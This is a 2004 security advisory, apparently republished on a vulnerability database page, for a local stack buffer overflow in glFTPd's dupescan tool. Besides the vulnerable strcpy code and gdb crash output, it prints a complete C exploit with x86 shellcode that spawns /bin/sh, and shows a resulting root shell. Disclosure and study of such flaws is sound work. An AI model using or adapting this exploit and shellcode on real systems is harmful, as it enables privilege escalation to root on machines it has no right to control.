Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

advisory-05-glFTPd.txt

🗓️ 21 Sep 2004 00:00:00Reported by CoKiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

glFTPd prior to version 2.00RC3 has a local stack buffer overflow vulnerability affecting security.

Code
`-------------------------------------------------  
No System Group - Advisory #05 - 18/09/04  
-------------------------------------------------  
Program: glFTPd  
Homepage: http://www.glftpd.com  
Vulnerable Versions: glFTPd v2.00RC3 and prior  
Risk: Low / Medium  
Impact: Local Stack Buffer Overflow Vulnerability  
-------------------------------------------------  
  
  
- DESCRIPTION  
-------------------------------------------------  
glFTPd is a very advanced ftp server with lots of   
possibilities. One of the main differences between   
many other ftp servers and glFTPd is that it has its   
own user database which can be completely maintained   
online using ftp site commands. Using ftp site commands   
it is also possible to see stats, view logs, execute   
scripts and do many more things. glFTPd runs within   
a chroot environment which makes it relatively safe.   
The glFTPd team continuously works on improving this   
free piece of beautiful software.  
  
More informations at: http://www.glftpd.com  
  
  
- DETAILS  
-------------------------------------------------  
This vulnerability is caused by an unsafe strcpy()   
that copies the entire parameter of the 'dupescan'   
to a stack buffer of 255 bytes.  
  
  
--- dupescan.c ---  
39: int main (int argc, char *argv[]) {  
40: FILE *fp;  
41: char dupename[255], dupefile[255], Temp[255];  
42: struct dupefile buffer;  
43: if (argc == 1){  
44: printf("USAGE: %s <filename>\n", argv[0]);  
45: return 0;  
46: }  
47:   
48: read_conf_datapath(Temp);  
49: sprintf(dupefile, "%s/logs/dupefile", Temp);  
50:   
51: strcpy(dupename, argv[1]); <----- THE BUG  
52: if((fp = fopen(dupefile, "r")) == NULL)  
53: return 0;  
54:   
--- dupescan.c ---  
  
coki@nosystem:~$ /glftpd/bin/dupescan `perl -e 'print "A" x 300'`  
Done  
Segmentation fault  
coki@nosystem:~$  
  
coki@nosystem:~$ gdb /glftpd/bin/dupescan  
GNU gdb 6.1.1  
Copyright 2004 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you are  
welcome to change it and/or distribute copies of it under certain conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/libthread_db.so.1".  
  
(gdb) r `perl -e 'print "A" x 300'`  
Starting program: /glftpd/bin/dupescan `perl -e 'print "A" x 300'`  
Done  
  
Program received signal SIGSEGV, Segmentation fault.  
0x41414141 in ?? ()  
(gdb) quit  
The program is running. Exit anyway? (y or n) y  
coki@nosystem:~$  
  
- EXPLOIT  
-------------------------------------------------  
  
-------------- glFTPd-dupe_exp.c ----------------  
/* glFTPd local stack buffer overflow exploit  
(Proof of Concept)  
  
Tested in Slackware 9.0 / 9.1 / 10.0  
  
by CoKi <[email protected]>  
No System Group - http://www.nosystem.com.ar  
*/  
  
#include <stdio.h>  
#include <strings.h>  
#include <unistd.h>  
  
#define BUFFER 288 + 1  
#define PATH "/glftpd/bin/dupescan"  
  
char shellcode[]=  
"\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x17\xcd\x80"  
"\x31\xdb\x31\xc0\xb0\x17\xcd\x80"  
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07"  
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"  
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";  
  
int main(void) {  
  
char *env[3] = {shellcode, NULL};  
char buf[BUFFER], *path;  
int *buffer = (int *) (buf);  
int i;  
int ret = 0xbffffffa - strlen(shellcode) - strlen(PATH);  
  
for(i=0; i<=BUFFER; i+=4)  
*buffer++ = ret;  
  
printf("\n glFTPd local stack buffer overflow (Proof of Concept)\n");  
printf(" by CoKi <[email protected]>\n\n");  
  
execle(PATH, "dupescan", buf, NULL, env);  
}  
  
-------------- glFTPd-dupe_exp.c ----------------  
  
coki@servidor:~$ make glFTPd-dupe_exp  
coki@servidor:~$ ./glFTPd-dupe_exp  
  
glFTPd local stack buffer overflow (Proof of Concept)  
by CoKi <[email protected]>  
  
Done  
sh-2.05b# id  
uid=0(root) gid=100(users) groups=100(users),11(floppy),17(audio),18(video),19(cdrom)  
sh-2.05b#  
  
'dupescan' is not setuid by default :(  
  
  
- SOLUTIONS  
-------------------------------------------------  
No yet  
  
- REFERENCES  
-------------------------------------------------  
http://www.nosystem.com.ar/advisories/advisory-05.txt  
  
  
- CREDITS  
-------------------------------------------------  
Discovered by CoKi <[email protected]>  
  
No System Group - http://www.nosystem.com.ar  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Sep 2004 00:00Current
7.4High risk
Vulners AI Score7.4
glftpdlocal stack buffer overflowvulnerable versionsuser databasechroot environmentstrcpy bug.
19